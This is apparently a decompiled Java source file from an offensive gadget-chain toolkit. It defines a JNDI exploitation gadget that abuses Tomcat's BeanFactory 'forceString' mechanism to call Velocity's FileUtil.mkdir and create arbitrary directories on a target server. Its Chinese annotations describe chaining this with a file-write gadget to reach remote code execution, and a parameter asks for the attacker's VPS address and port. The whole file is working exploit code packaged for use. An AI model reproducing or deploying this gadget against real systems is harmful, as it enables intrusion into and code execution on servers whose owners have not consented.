package com.ar3h.chains.gadget.impl.jndi.factory.beanfactory.createdir;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;
import javax.naming.StringRefAddr;
import org.apache.naming.ResourceRef;

@GadgetAnnotation(name = "Velocity创建任意文件夹", description = "factory: org.apache.naming.factory.BeanFactory\n在linux下通过 BeanFactory 调用单String方法：org.apache.velocity.texen.util.FileUtil#mkdir 创建任意文件夹\n之后配合 MemoryUserDatabaseFactoryWriteFile 实现写文件RCE", dependencies = {"tomcat", "org.apache.velocity:velocity"})
@GadgetTags(tags = {Tag.ResourceRef, Tag.TomcatBeanFactory, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/jndi/factory/beanfactory/createdir/VelocityCreateDirRef.class */
public class VelocityCreateDirRef implements Gadget {

    @Param(name = "文件夹路径", description = "这里需要填写你的vps ip、port，eg: http:/127.0.0.1:51399/\n执行后创建 'http:' 目录 和 '127.0.0.1:51399' 目录")
    public String dir = "http:/127.0.0.1:51399/";

    public Object getObject() {
        ResourceRef resourceRef = new ResourceRef("org.apache.velocity.texen.util.FileUtil", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
        resourceRef.add(new StringRefAddr("forceString", "x=mkdir"));
        resourceRef.add(new StringRefAddr("x", this.dir));
        return resourceRef;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject();
    }
}
